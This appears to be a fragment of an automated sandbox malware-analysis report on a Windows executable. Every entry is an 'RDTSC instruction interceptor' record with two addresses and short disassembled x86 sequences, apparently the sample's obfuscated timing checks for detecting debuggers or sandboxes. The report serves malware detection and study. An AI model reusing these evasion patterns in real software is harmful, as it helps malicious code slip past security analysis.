                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B573FA second address: B573FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5A777 second address: B5A78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FF3D0D8173Fh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5A78F second address: B5A793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5A793 second address: B5A799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5AA6C second address: B5AA8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF3D0F68BACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF3D0F68BAAh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5AA8F second address: B5AA93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5AA93 second address: B5AA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5AD4A second address: B5AD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0D81747h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AC7509 second address: AC7526 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F01F second address: B5F023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F2E7 second address: B5F2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0F68BABh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F2F6 second address: B5F309 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF3D0D8173Eh 0x00000008 jnc 00007FF3D0D81736h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F5D8 second address: B5F5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10543 second address: B10547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10547 second address: B105D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 call 00007FF3D0F68BB8h 0x0000000d pushad 0x0000000e mov eax, 3D133BD3h 0x00000013 mov eax, esi 0x00000015 popad 0x00000016 pop edx 0x00000017 mov ebx, dword ptr [ebp+1248A67Ch] 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FF3D0F68BA8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov dword ptr [ebp+122D2906h], ebx 0x0000003d mov dword ptr [ebp+122D2906h], esi 0x00000043 add eax, ebx 0x00000045 push 00000000h 0x00000047 push edi 0x00000048 call 00007FF3D0F68BA8h 0x0000004d pop edi 0x0000004e mov dword ptr [esp+04h], edi 0x00000052 add dword ptr [esp+04h], 00000015h 0x0000005a inc edi 0x0000005b push edi 0x0000005c ret 0x0000005d pop edi 0x0000005e ret 0x0000005f mov ch, 23h 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 je 00007FF3D0F68BACh 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B105D1 second address: B105D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B105D5 second address: B10604 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FF3D0F68BB3h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF3D0F68BB2h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F71C second address: B5F720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F720 second address: B5F726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F726 second address: B5F72D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F72D second address: B5F764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0F68BB6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FF3D0F68BAFh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F764 second address: B5F772 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF3D0D81754h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B603BE second address: B603C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B64184 second address: B6418A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B63D10 second address: B63D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FF3D0F68BA6h 0x0000000d jc 00007FF3D0F68BA6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6BEB1 second address: B6BEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF3D0D81736h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B69E01 second address: B69E2B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF3D0F68BB4h 0x00000008 push ebx 0x00000009 jmp 00007FF3D0F68BB1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B69F63 second address: B69F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FF3D0D8173Fh 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF3D0D8173Ah 0x00000015 jmp 00007FF3D0D8173Bh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B035 second address: B6B042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop esi 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B042 second address: B6B046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B2DF second address: B6B2F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FF3D0F68BA6h 0x00000009 jl 00007FF3D0F68BA6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FF3D0F68BA6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B2F9 second address: B6B2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B2FD second address: B6B319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jl 00007FF3D0F68BA6h 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007FF3D0F68BA6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B319 second address: B6B32D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D8173Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B32D second address: B6B331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B896 second address: B6B8B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF3D0D81736h 0x0000000a jmp 00007FF3D0D8173Ah 0x0000000f popad 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B8B1 second address: B6B8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6B8B6 second address: B6B8BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6BBB0 second address: B6BBFC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3D0F68BA6h 0x00000008 jmp 00007FF3D0F68BB0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FF3D0F68BAAh 0x00000014 jns 00007FF3D0F68BAAh 0x0000001a popad 0x0000001b jl 00007FF3D0F68BCFh 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 pop esi 0x00000025 jmp 00007FF3D0F68BB3h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B704C5 second address: B704C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6F801 second address: B6F805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6F805 second address: B6F809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6F809 second address: B6F82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0F68BB3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jp 00007FF3D0F68BA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6F82B second address: B6F84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jl 00007FF3D0D81736h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FF3D0D8173Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6F84A second address: B6F855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6FB14 second address: B6FB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6FE96 second address: B6FECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jne 00007FF3D0F68BA6h 0x0000000c jmp 00007FF3D0F68BAAh 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 jnp 00007FF3D0F68BAAh 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007FF3D0F68BA6h 0x00000024 jmp 00007FF3D0F68BAAh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B70028 second address: B7002E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B7002E second address: B70034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B70175 second address: B701B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnc 00007FF3D0D81736h 0x0000000e jmp 00007FF3D0D8173Ch 0x00000013 jmp 00007FF3D0D81746h 0x00000018 jmp 00007FF3D0D8173Ah 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B701B0 second address: B701B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7D578 second address: B7D57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7B721 second address: B7B725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7B725 second address: B7B729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7B9BC second address: B7B9C9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF3D0F68BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7BE41 second address: B7BE45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7BE45 second address: B7BE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7BFE2 second address: B7BFF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF3D0D81741h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7BFF8 second address: B7BFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7C189 second address: B7C199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FF3D0D81736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7C2FE second address: B7C30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FF3D0F68BA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7C49E second address: B7C4A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7CC87 second address: B7CC95 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF3D0F68BA6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7CC95 second address: B7CC99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7CC99 second address: B7CC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B7B12B second address: B7B12F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B82A1A second address: B82A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0F68BB5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B82A33 second address: B82A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B82A37 second address: B82A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF3D0F68BA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FF3D0F68BB3h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B82A5A second address: B82A87 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF3D0D81736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FF3D0D81785h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF3D0D8173Ch 0x00000019 jmp 00007FF3D0D8173Dh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B82BE2 second address: B82C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0F68BB7h 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FF3D0F68BA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B82C07 second address: B82C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B82C0B second address: B82C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B82D5C second address: B82D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B82D65 second address: B82D6D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B85424 second address: B85428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B85428 second address: B85434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B85434 second address: B8543A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B90D67 second address: B90D6C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B90D6C second address: B90D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FF3D0D81736h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B90D79 second address: B90DC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB0h 0x00000007 jne 00007FF3D0F68BA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FF3D0F68BACh 0x00000019 jmp 00007FF3D0F68BB7h 0x0000001e jnc 00007FF3D0F68BA6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B90DC3 second address: B90DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B90DC8 second address: B90DCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B90DCE second address: B90DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B90890 second address: B9089A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3D0F68BA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B9089A second address: B908A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FF3D0D81736h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B908A8 second address: B908B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B908B0 second address: B908D3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3D0D8173Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jp 00007FF3D0D8173Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B90A76 second address: B90A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007FF3D0F68BB2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B960CA second address: B960D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF3D0D81736h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B960D4 second address: B960F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB4h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a je 00007FF3D0F68BA6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B98900 second address: B98906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
